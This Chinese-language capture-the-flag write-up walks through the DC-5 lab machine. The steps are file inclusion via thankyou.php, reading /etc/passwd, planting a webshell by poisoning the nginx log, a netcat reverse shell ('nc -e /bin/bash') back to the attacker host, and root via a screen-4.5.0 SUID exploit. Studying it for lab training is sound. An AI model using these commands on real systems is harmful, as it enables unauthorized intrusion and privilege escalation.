DC-5

DC系列是专门构建的易受攻击的实验室，旨在获得渗透测试领域的经验，目前总共有9个靶机
关注微信公众号：网络安全101，公众号内回复**DC**，即可获取DC系列靶机镜像！

导入DC5靶机，网络适配器选择NAT模式，确保和kali处于同一IP段！！！

## 信息收集

> 确定主机IP地址

```bash
netdiscover -i eth0 -r 192.168.84.0/24
```

![image-20221216162311599](https://oss.maolin101.com/20250107035244207.png-101.webp)

> 端口扫描

![image-20221216162417725](https://oss.maolin101.com/20250107035244209.png-101.webp)

> nmap 扫描

![image-20221216163110130](https://oss.maolin101.com/20250107035244210.png-101.webp)

## WEB测试

> 目录扫描

![image-20221216163526527](https://oss.maolin101.com/20250107035244211.png-101.webp)

> 网页观察

http://192.168.84.181/footer.php 每次刷新都不一样，但是年份为2018、2017、2019、2020

![image-20221216163647834](https://oss.maolin101.com/20250107035244212.png-101.webp)

![image-20221216163654972](https://oss.maolin101.com/20250107035244213.png-101.webp)

http://192.168.84.181/thankyou.php，同样刷新该界面，年份也会发生变化，但是与footer.php页面相同

猜测有可能thankyou.php包含了页脚

其他页面的页脚都为2019，只有该页面才会随之变化，有可能调用了footer.php

> 尝试猜测

调用可能是通过file名称进行调用

![image-20221216164243963](https://oss.maolin101.com/20250107035244214.png-101.webp)

![image-20221216164437596](https://oss.maolin101.com/20250107035244215.png-101.webp)

传参值可能为file

> 服务器为Linux

![image-20221216164529331](https://oss.maolin101.com/20250107035244216.png-101.webp)

> 对file传参 file=/etc/passwd

读取到文件

![image-20221216164606651](https://oss.maolin101.com/20250107035244217.png-101.webp)

> 利用中间件日志写webshell

![image-20221216165438543](https://oss.maolin101.com/20250107035244218.png-101.webp)

当前中间件为nginx，nginx的日志默认路径为

```bash
nginx日志文件在路径 /var/log/nginx
日志开关在Nginx配置文件 /etc/nginx/nginx.conf
```

读取日志配置文件

![image-20221216165903898](https://oss.maolin101.com/20250107035244219.png-101.webp)

成功/失败日志记录位置

![image-20221216170039605](https://oss.maolin101.com/20250107035244220.png-101.webp)

> 把木马写入日志中，然后再配合文件包含 拿到shell

随便访问站点的某个网页，放入repeater模块

![image-20221216170943192](https://oss.maolin101.com/20250107035244221.png-101.webp)

![image-20221216171101023](https://oss.maolin101.com/20250107035244222.png-101.webp)

再次访问http://192.168.84.181/thankyou.php?file=/var/log/nginx/access.log

![image-20221216171208074](https://oss.maolin101.com/20250107035244223.png-101.webp)

> 蚁剑连接

url = http://192.168.84.181/thankyou.php?file=/var/log/nginx/access.log

密码 = 1

连接成功

![image-20221216171345289](https://oss.maolin101.com/20250107035244224.png-101.webp)

## 提权

> 反弹shell

蚁剑终端：nc -e /bin/bash 192.168.84.174 10086

![image-20221216171716677](https://oss.maolin101.com/20250107035244225.png-101.webp)

> 调用标准终端

```bash
python -c "import pty;pty.spawn('/bin/bash')"
```

![image-20221216171846474](https://oss.maolin101.com/20250107035244226.png-101.webp)

> 查看是否有可用的suid提权

```bash
find / -user root -perm -4000 -print 2>/dev/null
```

![image-20221216172550083](https://oss.maolin101.com/20250107035244227.png-101.webp)

观察到有一个screen-4.5.0

> 关于screen

![image-20221216172755086](https://oss.maolin101.com/20250107035244228.png-101.webp)

> screen提权

1、搜索相关漏洞及下载poc到本地

![image-20221216173108685](https://oss.maolin101.com/20250107035244229.png-101.webp)

2、分析sh文件

![image-20221216173319534](https://oss.maolin101.com/20250107035244230.png-101.webp)

开启http服务，将三个文本使用wget下载到/tmp目录下

```bash
python -m http.server 10000
```

3、直接执行./dc5.sh，等待编译成功后查看用户权限

![image-20221221183114559](https://oss.maolin101.com/20250107035244231.png-101.webp)

![image-20221221183153062](https://oss.maolin101.com/20250107035244232.png-101.webp)